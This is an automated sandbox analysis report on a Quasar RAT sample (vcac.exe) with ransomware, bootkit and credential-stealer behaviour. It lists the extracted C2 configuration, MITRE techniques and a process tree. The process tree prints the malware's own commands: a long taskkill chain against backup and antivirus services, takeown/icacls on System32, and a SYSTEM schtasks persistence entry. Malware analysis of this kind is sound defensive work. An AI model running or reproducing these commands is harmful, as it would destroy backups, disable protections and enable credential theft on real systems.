quasar | 65af8761b34d50026541f9607547c27fb40af28dabbe3f705fe69b551faf8496

Resubmissions

28/02/2024, 09:17

240228-k84xnaga5v 10

15/01/2024, 07:41

240115-jh96bachc6 10

23/10/2023, 07:49

231023-jn2q5agh62 10

17/10/2023, 15:34

231017-szv76ada4t 10

Analysis

max time kernel
148s
max time network
140s
platform
windows7_x64
resource
win7-20230831-en
resource tags

arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
submitted
17/10/2023, 15:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vcac.exe
Size

41.6MB
MD5

0fb2af6afdbdaf9206a5505264f0bf71
SHA1

2a6a04694b83ac2d4d0c207951fc838072804b6a
SHA256

65af8761b34d50026541f9607547c27fb40af28dabbe3f705fe69b551faf8496
SHA512

f5edebf5a9d4d0d4e5c11285febace0c65cf998573267da4016af563920de76f970b41661e2888de06cae737b56bc31a19c7f588993fc3e16828cb99c96ef7d7
SSDEEP

393216:Q/joxiIE7YoPQtsTTp7Lk3meBcGfd0vYM2krlFk1mX1eq44:Ijoe7rPQts/RLaT5F0vYvXFg

Score

10^/10

quasar user bootkit collection discovery evasion exploit persistence pyinstaller ransomware spyware stealer trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
1

Extracted

Family

quasar

Version

1.4.1

Botnet

user

192.168.0.13:3440

elpepemanca.ddns.net:3440

Mutex

5950a87d-00d0-4fc0-a953-61143318e6d1

Attributes

encryption_key
1A866C514D7B8C5F02AAA72B847C1F305295B74C
install_name
Windows.exe
log_directory
Logs
reconnect_delay
1
startup_key
Discord.exe
subdirectory
System

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 7 IoCs

resource	yara_rule
behavioral1/memory/2736-1-0x00000000010F0000-0x0000000003A8A000-memory.dmp	family_quasar
behavioral1/files/0x0006000000015ca4-364.dat	family_quasar
behavioral1/files/0x0006000000015ca4-367.dat	family_quasar
behavioral1/files/0x0006000000015ca4-368.dat	family_quasar
behavioral1/memory/1816-375-0x0000000000A30000-0x0000000000D54000-memory.dmp	family_quasar
behavioral1/memory/2912-825-0x0000000000B40000-0x0000000000E64000-memory.dmp	family_quasar
behavioral1/memory/2580-892-0x0000000000050000-0x0000000000374000-memory.dmp	family_quasar

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Disables Task Manager via registry modification
evasion

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	vcac.exe

Modifies Windows Firewall 1 TTPs 5 IoCs

evasion

Windows Service

T1543.003

pid	Process
2556	netsh.exe
3056	netsh.exe
1532	netsh.exe
872	netsh.exe
2332	netsh.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2796	takeown.exe
2828	icacls.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	vcac.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe	vcac.exe

Executes dropped EXE 12 IoCs

pid	Process
2780	lm.exe
2456	mbr.exe
2432	svchost.exe
2952	pass.exe
2104	steal.exe
1816	server.exe
896	discord.exe
1328	LaZagne.exe
1948	steal.exe
1008	LaZagne.exe
2912	server.exe
2580	server.exe

Loads dropped DLL 64 IoCs

pid	Process
2572	cmd.exe
2780	lm.exe
2780	lm.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2980	cmd.exe
2980	cmd.exe
1948	steal.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1368	Process not Found
1368	Process not Found
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2796	takeown.exe
2828	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 7 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook	LaZagne.exe
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	LaZagne.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\mbr.exe"	mbr.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-86725733-3001458681-3405935542-1000\desktop.ini	vcac.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1542.003

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	lm.exe
File opened for modification	\??\PhysicalDrive0	mbr.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\LogonUI.exe	svchost.exe

Detects Pyinstaller 11 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0006000000015c9d-339.dat	pyinstaller
behavioral1/files/0x0006000000015c9d-333.dat	pyinstaller
behavioral1/files/0x0006000000015c9d-338.dat	pyinstaller
behavioral1/files/0x0006000000016d41-431.dat	pyinstaller
behavioral1/files/0x0006000000016d41-421.dat	pyinstaller
behavioral1/files/0x0006000000016d41-423.dat	pyinstaller
behavioral1/files/0x0006000000016d41-422.dat	pyinstaller
behavioral1/files/0x0006000000015c9d-472.dat	pyinstaller
behavioral1/files/0x0006000000016d41-564.dat	pyinstaller
behavioral1/files/0x0006000000015c9d-574.dat	pyinstaller
behavioral1/files/0x0006000000015c9d-573.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2696	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
2712	vssadmin.exe

Kills process with taskkill 42 IoCs

evasion

pid	Process
2548	taskkill.exe
576	taskkill.exe
2904	taskkill.exe
1172	taskkill.exe
1716	taskkill.exe
2472	taskkill.exe
564	taskkill.exe
1576	taskkill.exe
1756	taskkill.exe
1468	taskkill.exe
688	taskkill.exe
2556	taskkill.exe
1400	taskkill.exe
1952	taskkill.exe
2860	taskkill.exe
1788	taskkill.exe
2016	taskkill.exe
928	taskkill.exe
1616	taskkill.exe
600	taskkill.exe
2728	taskkill.exe
2612	taskkill.exe
1804	taskkill.exe
1256	taskkill.exe
1572	taskkill.exe
1284	taskkill.exe
1012	taskkill.exe
2932	taskkill.exe
1716	taskkill.exe
1128	taskkill.exe
1476	taskkill.exe
2528	taskkill.exe
2268	taskkill.exe
2764	taskkill.exe
1364	taskkill.exe
1788	taskkill.exe
2476	taskkill.exe
1548	taskkill.exe
2064	taskkill.exe
2236	taskkill.exe
1136	taskkill.exe
1804	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2464	reg.exe
1632	reg.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
2832	PING.EXE
3008	PING.EXE
2900	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2952	pass.exe
2952	pass.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
1004	powershell.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
1008	LaZagne.exe
872	powershell.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
1008	LaZagne.exe
1008	LaZagne.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	vcac.exe
Token: SeTakeOwnershipPrivilege	2796	takeown.exe
Token: SeDebugPrivilege	2728	taskkill.exe
Token: SeBackupPrivilege	2444	reg.exe
Token: SeRestorePrivilege	2444	reg.exe
Token: SeAuditPrivilege	2444	reg.exe
Token: SeIncreaseQuotaPrivilege	2836	WMIC.exe
Token: SeSecurityPrivilege	2836	WMIC.exe
Token: SeTakeOwnershipPrivilege	2836	WMIC.exe
Token: SeLoadDriverPrivilege	2836	WMIC.exe
Token: SeSystemProfilePrivilege	2836	WMIC.exe
Token: SeSystemtimePrivilege	2836	WMIC.exe
Token: SeProfSingleProcessPrivilege	2836	WMIC.exe
Token: SeIncBasePriorityPrivilege	2836	WMIC.exe
Token: SeCreatePagefilePrivilege	2836	WMIC.exe
Token: SeBackupPrivilege	2836	WMIC.exe
Token: SeRestorePrivilege	2836	WMIC.exe
Token: SeShutdownPrivilege	2836	WMIC.exe
Token: SeDebugPrivilege	2836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2836	WMIC.exe
Token: SeRemoteShutdownPrivilege	2836	WMIC.exe
Token: SeUndockPrivilege	2836	WMIC.exe
Token: SeManageVolumePrivilege	2836	WMIC.exe
Token: 33	2836	WMIC.exe
Token: 34	2836	WMIC.exe
Token: 35	2836	WMIC.exe
Token: SeDebugPrivilege	576	taskkill.exe
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	1576	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2836	WMIC.exe
Token: SeSecurityPrivilege	2836	WMIC.exe
Token: SeTakeOwnershipPrivilege	2836	WMIC.exe
Token: SeLoadDriverPrivilege	2836	WMIC.exe
Token: SeSystemProfilePrivilege	2836	WMIC.exe
Token: SeSystemtimePrivilege	2836	WMIC.exe
Token: SeProfSingleProcessPrivilege	2836	WMIC.exe
Token: SeIncBasePriorityPrivilege	2836	WMIC.exe
Token: SeCreatePagefilePrivilege	2836	WMIC.exe
Token: SeBackupPrivilege	2836	WMIC.exe
Token: SeRestorePrivilege	2836	WMIC.exe
Token: SeShutdownPrivilege	2836	WMIC.exe
Token: SeDebugPrivilege	2836	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2836	WMIC.exe
Token: SeRemoteShutdownPrivilege	2836	WMIC.exe
Token: SeUndockPrivilege	2836	WMIC.exe
Token: SeManageVolumePrivilege	2836	WMIC.exe
Token: 33	2836	WMIC.exe
Token: 34	2836	WMIC.exe
Token: 35	2836	WMIC.exe
Token: SeDebugPrivilege	2016	taskkill.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeBackupPrivilege	1692	vssvc.exe
Token: SeRestorePrivilege	1692	vssvc.exe
Token: SeAuditPrivilege	1692	vssvc.exe
Token: SeDebugPrivilege	1400	taskkill.exe
Token: SeDebugPrivilege	1788	taskkill.exe
Token: SeDebugPrivilege	2952	pass.exe
Token: SeDebugPrivilege	1952	taskkill.exe
Token: SeDebugPrivilege	1284	taskkill.exe
Token: SeDebugPrivilege	896	discord.exe
Token: SeDebugPrivilege	1756	taskkill.exe
Token: SeDebugPrivilege	1816	server.exe
Token: SeDebugPrivilege	2064	taskkill.exe
Token: SeDebugPrivilege	2236	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe
2736	vcac.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1816	server.exe
2912	server.exe
2580	server.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 2648	2736	vcac.exe	29
PID 2736 wrote to memory of 2648	2736	vcac.exe	29
PID 2736 wrote to memory of 2648	2736	vcac.exe	29
PID 2736 wrote to memory of 2648	2736	vcac.exe	29
PID 2736 wrote to memory of 2572	2736	vcac.exe	30
PID 2736 wrote to memory of 2572	2736	vcac.exe	30
PID 2736 wrote to memory of 2572	2736	vcac.exe	30
PID 2736 wrote to memory of 2572	2736	vcac.exe	30
PID 2572 wrote to memory of 2780	2572	cmd.exe	32
PID 2572 wrote to memory of 2780	2572	cmd.exe	32
PID 2572 wrote to memory of 2780	2572	cmd.exe	32
PID 2572 wrote to memory of 2780	2572	cmd.exe	32
PID 2736 wrote to memory of 2456	2736	vcac.exe	33
PID 2736 wrote to memory of 2456	2736	vcac.exe	33
PID 2736 wrote to memory of 2456	2736	vcac.exe	33
PID 2736 wrote to memory of 2456	2736	vcac.exe	33
PID 2736 wrote to memory of 2432	2736	vcac.exe	34
PID 2736 wrote to memory of 2432	2736	vcac.exe	34
PID 2736 wrote to memory of 2432	2736	vcac.exe	34
PID 2736 wrote to memory of 2432	2736	vcac.exe	34
PID 2456 wrote to memory of 2696	2456	mbr.exe	36
PID 2456 wrote to memory of 2696	2456	mbr.exe	36
PID 2456 wrote to memory of 2696	2456	mbr.exe	36
PID 2456 wrote to memory of 2696	2456	mbr.exe	36
PID 2432 wrote to memory of 776	2432	svchost.exe	37
PID 2432 wrote to memory of 776	2432	svchost.exe	37
PID 2432 wrote to memory of 776	2432	svchost.exe	37
PID 776 wrote to memory of 2796	776	cmd.exe	39
PID 776 wrote to memory of 2796	776	cmd.exe	39
PID 776 wrote to memory of 2796	776	cmd.exe	39
PID 776 wrote to memory of 2828	776	cmd.exe	40
PID 776 wrote to memory of 2828	776	cmd.exe	40
PID 776 wrote to memory of 2828	776	cmd.exe	40
PID 2736 wrote to memory of 3044	2736	vcac.exe	42
PID 2736 wrote to memory of 3044	2736	vcac.exe	42
PID 2736 wrote to memory of 3044	2736	vcac.exe	42
PID 2736 wrote to memory of 3044	2736	vcac.exe	42
PID 2736 wrote to memory of 1592	2736	vcac.exe	45
PID 2736 wrote to memory of 1592	2736	vcac.exe	45
PID 2736 wrote to memory of 1592	2736	vcac.exe	45
PID 2736 wrote to memory of 1592	2736	vcac.exe	45
PID 2736 wrote to memory of 1412	2736	vcac.exe	46
PID 2736 wrote to memory of 1412	2736	vcac.exe	46
PID 2736 wrote to memory of 1412	2736	vcac.exe	46
PID 2736 wrote to memory of 1412	2736	vcac.exe	46
PID 3044 wrote to memory of 2728	3044	cmd.exe	48
PID 3044 wrote to memory of 2728	3044	cmd.exe	48
PID 3044 wrote to memory of 2728	3044	cmd.exe	48
PID 3044 wrote to memory of 2728	3044	cmd.exe	48
PID 1412 wrote to memory of 2712	1412	cmd.exe	49
PID 1412 wrote to memory of 2712	1412	cmd.exe	49
PID 1412 wrote to memory of 2712	1412	cmd.exe	49
PID 1412 wrote to memory of 2712	1412	cmd.exe	49
PID 1592 wrote to memory of 2556	1592	cmd.exe	106
PID 1592 wrote to memory of 2556	1592	cmd.exe	106
PID 1592 wrote to memory of 2556	1592	cmd.exe	106
PID 1592 wrote to memory of 2556	1592	cmd.exe	106
PID 1412 wrote to memory of 2836	1412	cmd.exe	53
PID 1412 wrote to memory of 2836	1412	cmd.exe	53
PID 1412 wrote to memory of 2836	1412	cmd.exe	53
PID 1412 wrote to memory of 2836	1412	cmd.exe	53
PID 3044 wrote to memory of 576	3044	cmd.exe	55
PID 3044 wrote to memory of 576	3044	cmd.exe	55
PID 3044 wrote to memory of 576	3044	cmd.exe	55

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	LaZagne.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	LaZagne.exe

C:\Users\Admin\AppData\Local\Temp\vcac.exe
"C:\Users\Admin\AppData\Local\Temp\vcac.exe"
1⤵
- Drops file in Drivers directory
- Drops startup file
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
  2⤵
  PID:2648
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2572
- - C:\Users\Admin\AppData\Roaming\lm.exe
    lm.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Writes to the Master Boot Record (MBR)
    PID:2780
- C:\Users\Admin\AppData\Roaming\mbr.exe
  "C:\Users\Admin\AppData\Roaming\mbr.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Writes to the Master Boot Record (MBR)
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
    3⤵
    - Creates scheduled task(s)
    PID:2696
- C:\Users\Admin\AppData\Roaming\svchost.exe
  "C:\Users\Admin\AppData\Roaming\svchost.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:776
  - - C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2796
  - - C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32 /grant "Admin:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2828
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecAgentBrowser*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2728
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecDiveciMediaService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecJobEngine*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecManagementService*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM vss*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2016
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sql*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1364
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM svc$*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM memtas*
    3⤵
    - Kills process with taskkill
    PID:1788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1952
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1284
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM backup*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1756
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxVss*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxBlr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2236
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxFWD*
    3⤵
    - Kills process with taskkill
    PID:2904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCVD*
    3⤵
    - Kills process with taskkill
    PID:2612
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM GxCIMgr*
    3⤵
    - Kills process with taskkill
    PID:2476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM DefWatch*
    3⤵
    - Kills process with taskkill
    PID:2860
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM SavRoam*
    3⤵
    - Kills process with taskkill
    PID:1804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:1172
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBFCService*
    3⤵
    - Kills process with taskkill
    PID:1716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:1468
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooBackup*
    3⤵
    - Kills process with taskkill
    PID:1548
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM YooIT*
    3⤵
    - Kills process with taskkill
    PID:688
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:1136
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM sophos*
    3⤵
    - Kills process with taskkill
    PID:1476
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM stc_raw_agent*
    3⤵
    - Kills process with taskkill
    PID:2528
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VSNAPVSS*
    3⤵
    - Kills process with taskkill
    PID:2556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM QBCFMonitorService*
    3⤵
    - Kills process with taskkill
    PID:2472
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamTransportSvc*
    3⤵
    - Kills process with taskkill
    PID:1012
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamDeploymentService*
    3⤵
    - Kills process with taskkill
    PID:2932
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM VeeamNFSSvc*
    3⤵
    - Kills process with taskkill
    PID:564
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM veeam*
    3⤵
    - Kills process with taskkill
    PID:928
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM PDVFSService*
    3⤵
    - Kills process with taskkill
    PID:1256
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /F /IM BackupExecVSSProvider*
    3⤵
    - Kills process with taskkill
    PID:2268
